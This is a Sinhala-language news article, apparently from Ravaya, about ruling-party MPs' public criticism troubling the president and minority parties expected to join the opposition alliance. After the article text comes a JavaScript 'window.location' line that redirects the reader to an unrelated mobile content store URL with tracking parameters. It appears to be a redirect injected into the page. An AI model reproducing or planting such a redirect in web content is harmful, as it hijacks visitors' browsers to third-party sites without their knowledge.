රාවය

මැති ඇමති කතා ජනපතිට හිසරදයක් වේ

මැති ඇමති කතා ජනපතිට හිසරදයක් වේ

මහා පරිමාණයෙන් මුදල් වීසි කරන ප‍්‍රතිපත්තියක් මගින් විරුද්ධ පක්ෂයට මන්ත‍්‍රීවරුන් එකතුවීමේ ක‍්‍රියාවලිය කිසියම් ප‍්‍රමාණයකට පාලනය කරගැනීමට ආණ්ඩුව සමත්ව ඇතත්, ආණ්ඩු පක්ෂයේ මන්ත‍්‍රීවරුන් ජනාධිපතිවරයා කෙරෙහි අප‍්‍රසාදයක් හෝ අපකීර්තියක් ඇතිවන ආකාරයට ජනමාධ්‍යවලට ප‍්‍රකාශ නිකුත් කිරීම දැන් ජනාධිපතිවරයාට මුහුණ දෙන්නට සිදුවී තිබෙන ලොකුම හිසරදයක් බවට පත්ව තිබේ.

මෙම තත්ත්වය ආණ්ඩුවේ බෙලහීනතාව උග‍්‍ර කිරීමට හේතුවී තිබෙන අතර ජනාධිපතිවරයාගේ පවුලේ සමහර සාමාජිකයන් මෙම තත්ත්වය හඳුනාගෙන තිබෙන්නේ සල්ලිත් අරගෙන වෙනත් මුහුණුවරකින් පවත්වාගෙන යන කඩාකප්පල්කාරී ක‍්‍රියාදාමයක් වශයෙනි.

ආණ්ඩු පක්ෂයේ බොහෝ ප‍්‍රකාශකයන් ජනාධිපතිවරයාට සහාය පළකරමින් තිබෙන්නේ ආණ්ඩුව අන්ත දූෂිත ආණ්ඩුවක් බව ප‍්‍රසිද්ධියේ ප‍්‍රකාශ කරන අතරය. ජනාධිපතිවරයාගේ ෆයිල් කතාවද ආණ්ඩු පක්ෂයේ මන්ත‍්‍රීවරුන් විසින් ප‍්‍රසිද්ධියේ විවේචනයට ලක් කෙරෙන ජනප‍්‍රිය මාතෘකාවක් බවට පත්වී තිබේ.

ඊළඟ වටයේදී ආණ්ඩුවට මුහුණ දෙන්නට සිදුවී ඇත්තේ තනි තනි පුද්ගලයන් වෙනුවට ආණ්ඩුවට එකතු වී සිටින සුළු ජාතික පක්ෂ විරුද්ධ පක්ෂයට එකතුවීමය. දෙමළ සන්ධානය විරුද්ධ පක්ෂ සන්ධානයට එකතුවීමට නියමිතව තිබෙන අතර ඒ සමග මුස්ලිම් කොංග‍්‍රසය හා අන් සුළු ජාතික පක්ෂ විරුද්ධ පක්ෂ සන්ධානයට එකතුවීමට නියමිතය. ඒ නිසා තවදුරටත් ආණ්ඩු පක්ෂයේ ඇතිවන බෙලහීනතාව තුළ ආණ්ඩු පක්ෂයේ තවත් මන්ත‍්‍රීවරුන් විරුද්ධ පක්ෂ සන්ධානයට එකතුවිය හැකිය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;